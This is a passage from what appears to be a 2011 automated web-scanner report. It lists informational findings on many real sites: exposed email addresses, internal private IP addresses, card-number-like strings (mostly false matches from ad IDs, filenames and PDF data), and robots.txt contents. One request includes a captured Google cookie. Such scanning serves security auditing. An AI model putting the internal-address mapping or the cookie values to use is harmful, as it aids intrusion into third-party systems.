Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Fun in the Snow</title>
<meta name="publisher" content="New England Ne
...[SNIP]...
<p>Send your Fun in the Snow pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.484. http://www1.whdh.com/slideshows/view/January12thStormPets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January12thStormPets

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:49 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 94
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:55:49 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:55:49 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 22779
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: Winter Weather - Snowy Pets</title>
<meta name="publisher" content="Ne
...[SNIP]...
<p>Send your Winter Weather - Snowy Pets pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.485. http://www1.whdh.com/slideshows/view/January12thTreesDown previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January12thTreesDown

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:22 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:22 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:22 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23062
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 12th Trees Down</title>
<meta name="publisher" content="New En
...[SNIP]...
<p>Send your January 12th Trees Down pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.486. http://www1.whdh.com/slideshows/view/January18WinterStorm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January18WinterStorm

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Warning: 113 www1.whdh.com "Heuristic expiration" "Mon, 24 Jan 2011 21:57:25 GMT"
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:25 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23072
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 18 Snow/Ice Storm</title>
<meta name="publisher" content="New
...[SNIP]...
<p>Send your January 18 Snow/Ice Storm pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.487. http://www1.whdh.com/slideshows/view/January21SnowStorm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/slideshows/view/January21SnowStorm

Issue detail

The following email address was disclosed in the response:

senditto7@whdh.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Age: 0
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 31 Jan 2011 21:57:19 GMT
Cache-Control: max-age=604800
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21934
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH Gallery: January 21 Snow Storm</title>
<meta name="publisher" content="New Engl
...[SNIP]...
<p>Send your January 21 Snow Storm pics to senditto7@whdh.com to be featured on our website.</p>
...[SNIP]...

24.488. http://www3.whdh.com/mobile/phoneforecast/settings.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www3.whdh.com
Path:	/mobile/phoneforecast/settings.php

Issue detail

The following email address was disclosed in the response:

webmaster@whdh.com

Request

GET /mobile/phoneforecast/settings.php HTTP/1.1
Host: www3.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.489. http://xpn.altervista.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xpn.altervista.org
Path:	/

Issue detail

The following email address was disclosed in the response:

nemesis2001@gmx.it

Request

GET / HTTP/1.1
Host: xpn.altervista.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Apache
Last-Modified: Sun, 01 Feb 2009 11:57:51 GMT
ETag: "4a1f0-14ff-461da25c0cdc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5375
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<a href="MAILTO:nemesis2001@gmx.it">nemesis2001@gmx.it
<img src="images/mail_generic.png" width="32" height="32" alt="mail" />
...[SNIP]...

25. Private IP addresses disclosed previous next
There are 12 instances of this issue:

http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
http://green.autobytel.com/
http://whdhstore.hipcricket.com/
http://www.autobytel.com/x22
http://www.digitaltips.org/
http://www.google.com/sdch/GeNLY2f-.dct
http://www.metacafe.com/fplayer/
http://www.myride.com/
http://www.officedepot.com/promo.do
http://www.x64bitdownload.com/64-bit-news-downloads.html
http://www.x64bitdownload.com/64-bit-ssl-downloads.html
http://www.x64bitdownload.com/64-bit-synchronization-downloads.html

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

25.1. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.cloudscan.us
Path:	/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

10.2.129.225
10.2.130.111
10.2.130.26

Request

Response

25.2. http://green.autobytel.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://green.autobytel.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.4.128.192

Request

GET / HTTP/1.1
Host: green.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.3. http://whdhstore.hipcricket.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://whdhstore.hipcricket.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

192.168.10.76

Request

GET / HTTP/1.1
Host: whdhstore.hipcricket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.4. http://www.autobytel.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/x22

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.4.128.184

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.5. http://www.digitaltips.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digitaltips.org
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.57

Request

GET / HTTP/1.1
Host: www.digitaltips.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.6. http://www.google.com/sdch/GeNLY2f-.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/GeNLY2f-.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/GeNLY2f-.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt
If-Modified-Since: Fri, 21 Jan 2011 14:44:32 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Mon, 24 Jan 2011 10:48:22 GMT
Date: Mon, 24 Jan 2011 14:54:00 GMT
Expires: Mon, 24 Jan 2011 14:54:00 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 107132

Domain: .google.com
Path: /search

- Google Search</title><script>window.google={kEI:" QT0T WJ_5AKtpypmg8",kEXPI:"27344,27642,27744WJ_5AKtpypmg8",expi:"27344,27642,27744CMMWJ_5
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: 4AUACFJFdYwJ:search.aol.com/+aolMJE2Iq51jh0J:webmail.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'
...[SNIP]...
<a href="/search?hl=en&q=inauthor:" http://172.31.196.197:8888/search?q=cache: dictionary.reference.com/browse/ &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1 2','','0CD ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:v_TYzMSa2vkJ:www.whitepages.com/+ &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1 wQqwMoA ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J: i en.wikipedia.org/wiki/DirecTV+direct www.directv.com/DTVAPP/epg/theGuide.jsp+direct www.directv.com/DTVAPP/content/ +direct
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','6','','0C c ')">
...[SNIP]...
<a href="/search?hl=en&q=inauthor:"http://172.31.196.197:8888/search?q=cache: " onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','1','','0CC QIDAA')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: J:explore.live.com/windows-live- &hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','',' &tbo=1&sa=X&ei=4AT0TsWJ_5AKtpypmg
...[SNIP]...
<a href="/search?hl=en&q=related: s&tbo=1&sa=X&ei=4AT0Thttp://172.31.196.197:8888/search?q=cache:&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this.href,'','','','10','','0C opics.nytimes.com/top/news/business/companies/ WJ_5AKtpypm
...[SNIP]...

25.7. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.16.176.202

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!--
           var omniProps = {"serverName":"270211-web56.metacafe.com","maxFlashVersion":"9","eVar1":"not logged-in","eVar2":"family filter on","prop1":15,"prop2":"C=244 L=9","server":"172.16.176.202","events":null,"prop46":"KPI-fplayer","pageName":"Metacafe homepage","channel":"Home","prop28":"2","prop34":"2","":"0","prop49":"0","prop47":"0"};
           var omniCookieObj = MooTools.version == '1.11' ?
...[SNIP]...
tp:') {
                   iOmnitureMC = new OmnitureMC({"serverName":"270211-web56.metacafe.com","maxFlashVersion":"9","eVar1":"not logged-in","eVar2":"family filter on","prop1":15,"prop2":"C=244 L=9","server":"172.16.176.202","events":null,"prop46":"KPI-fplayer","pageName":"Metacafe homepage","channel":"Home","prop28":"2","prop34":"2","":"0","prop49":"0","prop47":"0"}, {"WikiRecentChanges":{"events":"event67"}});
               }
...[SNIP]...

25.8. http://www.myride.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myride.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.4.128.192

Request

GET / HTTP/1.1
Host: www.myride.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.9. http://www.officedepot.com/promo.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.officedepot.com
Path:	/promo.do

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.95.65.84

Request

GET /promo.do HTTP/1.1
Host: www.officedepot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.10. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.1.4

Request

Response

25.11. http://www.x64bitdownload.com/64-bit-ssl-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ssl-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.3.0.1

Request

Response

25.12. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-synchronization-downloads.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.1.4

Request

Response

26. Credit card numbers disclosed previous next
There are 5 instances of this issue:

http://d1.openx.org/ajs.php
http://www.masjo.com/
http://www.netlingo.com/2010mediakit.pdf
http://www.netlingo.com/news/Safe_and_Secure_in_Cyberspace.pdf
http://www.parenthood.com/

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

26.1. http://d1.openx.org/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/ajs.php

Issue detail

The following credit card number was disclosed in the response:

5834998644254472

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:01 GMT; path=/
Content-Length: 4795
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_9ad7ea60 = '';
OX_9ad7ea60 += "<"+"script type=\"text/javascript\">\n";
OX_9ad7ea60 += "OXM_ad = {\"website\":\"7f43337b-cb6f-453f-9ae5-4abd7cd18bda\",\n";
OX_9ad7ea60 += "\"size\":\"468x60\",\n";
OX_9ad7ea60 += "\"floor\":\"0.1\",\n";
OX_9ad7ea60 += "\"channel\":\"oxpv1:58349-98644-254472-4738-17099\",\n";
OX_9ad7ea60 += "\"hrid\":\"dda27c0e92ce176b4b94dc8a5861a24c-1295921101\",\n";
OX_9ad7ea60 += "\"beacon\":\"<"+"div id=\'beacon_a2563a7fcc\' style=\'position: absolute; left: 0px; top
...[SNIP]...

26.2. http://www.masjo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/

Issue detail

The following credit card number was disclosed in the response:

4406691295577660

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 44976
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<img src="http://www.masjo.com/wp-content/themes/masjo/thumb.php?src=wp-content/plugins/archieve/images/d31a6_marshallsoft_gps_component_for_vb-440669-1295577660.jpeg&w=100&h=100&zc=1&q=90" alt="MarshallSoft GPS Component for VB" class="thumbnail alignleft woo-image" width="100" height="100" />
...[SNIP]...

26.3. http://www.netlingo.com/2010mediakit.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/2010mediakit.pdf

Issue detail

The following credit card number was disclosed in the response:

4984440000000000

Request

GET /2010mediakit.pdf HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 07 Feb 2010 03:22:17 GMT
ETag: "3367fb-1c78e-31118c40"
Accept-Ranges: bytes
Content-Length: 116622
Connection: close
Content-Type: application/pdf

%PDF-1.4%....
162 0 obj<</H[1094 315]/Linearized 1/E 14520/L 116622/N 5/O 165/T 113334>>endobj
...[SNIP]...
89 601 678 561 521 667 0 373 417 0 498 771 667 708 551 708 621 557 584 656 597 902 581 576 0 0 0 0 0 0 0 525 553 461 553 526 318 553 558 229 282 498 229 840 558 543 553 553 360 446 334 558 498 742 495 498 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 211 401 401 0 546]>
...[SNIP]...

26.4. http://www.netlingo.com/news/Safe_and_Secure_in_Cyberspace.pdf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/news/Safe_and_Secure_in_Cyberspace.pdf

Issue detail

The following credit card number was disclosed in the response:

3520459063600269

Request

GET /news/Safe_and_Secure_in_Cyberspace.pdf HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:24 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Jan 2009 13:06:12 GMT
ETag: "367848-b2e9-efc75900"
Accept-Ranges: bytes
Content-Length: 45801
Connection: close
Content-Type: application/pdf
X-Pad: avoid browser bug

%PDF-1.4%....
183 0 obj<</H[1423 303]/Linearized 1/E 32077/L 45774/N 2/O 186/T 42093>>endobj
xref
183 55
0000000016 00000 n
0000001905 00000 n
0000001423 00000 n
0000002141
...[SNIP]...
</Type/Font/Encoding/WinAnsiEncoding/BaseFont/Verdana/FirstChar 32/LastChar 122/Subtype/TrueType/FontDescriptor 205 0 R/Widths[352 0 459 0 636 0 0 269 0 0 0 0 364 454 364 454 0 636 636 0 0 0 0 0 0 636 454 0 0 0 0 545 0 684 686 698 771 632 575 0 0 421 455 0 557 843 0 787 603 0 695 684 616 0 0 989 0 615 0 0 0 0 0 0 0 601 623 521 623 596 352 623 633 27
...[SNIP]...

26.5. http://www.parenthood.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.parenthood.com
Path:	/

Issue detail

The following credit card number was disclosed in the response:

5122305315883814

Request

GET / HTTP/1.1
Host: www.parenthood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

27. Robots.txt file previous next
There are 9 instances of this issue:

http://api.recaptcha.net/challenge
http://clients1.google.com/complete/search
http://demo.joomla.org/plugins/system/jceutilities/css/jceutilities.css
http://filewatcher.org/css/filewatcher.css
http://www.cloudaccess.net/templates/rt_quasar_j15/lib/gantry/css/gantry.css
https://www.cloudaccess.net/my-cloud-panel.html
http://www.microsoft.com/web/media/badge/install_using_webpi_btn.png
http://www.x64bitdownload.com/templates/X64/css/rating.css
http://www.youtube.com/subscribe_widget

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

27.1. http://api.recaptcha.net/challenge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.recaptcha.net
Path:	/challenge

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.recaptcha.net

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 14:58:39 GMT
Content-Type: text/plain
Content-Length: 56
Last-Modified: Wed, 02 May 2007 21:27:43 GMT
Connection: close
P3P: CP="NOI ADM DEV PSA PSD UNI COM NAV OUR STP"
Accept-Ranges: bytes

# not on the api sites please
User-agent: *
Disallow: /

27.2. http://clients1.google.com/complete/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clients1.google.com
Path:	/complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Mon, 24 Jan 2011 14:58:41 GMT
Expires: Mon, 24 Jan 2011 14:58:41 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.3. http://demo.joomla.org/plugins/system/jceutilities/css/jceutilities.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/plugins/system/jceutilities/css/jceutilities.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: demo.joomla.org

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:51 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Mon, 15 Mar 2010 18:10:08 GMT
ETag: "1d99912-130-481daca8e0000"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.4. http://filewatcher.org/css/filewatcher.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://filewatcher.org
Path:	/css/filewatcher.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: filewatcher.org

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:54:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Fri, 17 Oct 2008 13:19:43 GMT
ETag: "5d4098-9c-45972d182d9c0"
Accept-Ranges: bytes
Content-Length: 156
Cache-Control: max-age=259200
Expires: Thu, 27 Jan 2011 14:54:27 GMT
Vary: Accept-Encoding
Content-Type: text/plain
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 425
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

User-agent: *
Disallow: /_/
Disallow: /-/

User-agent: Me2di2apartners-Go2ogle*
Disallow: /

User-agent: NPBot*
Disallow: /

User-agent: psbot*
Disallow: /

27.5. http://www.cloudaccess.net/templates/rt_quasar_j15/lib/gantry/css/gantry.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/templates/rt_quasar_j15/lib/gantry/css/gantry.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloudaccess.net

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Sat, 05 Dec 2009 13:57:03 GMT
ETag: "1d9993d-130-479fb9953c9c0"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.6. https://www.cloudaccess.net/my-cloud-panel.html previous next

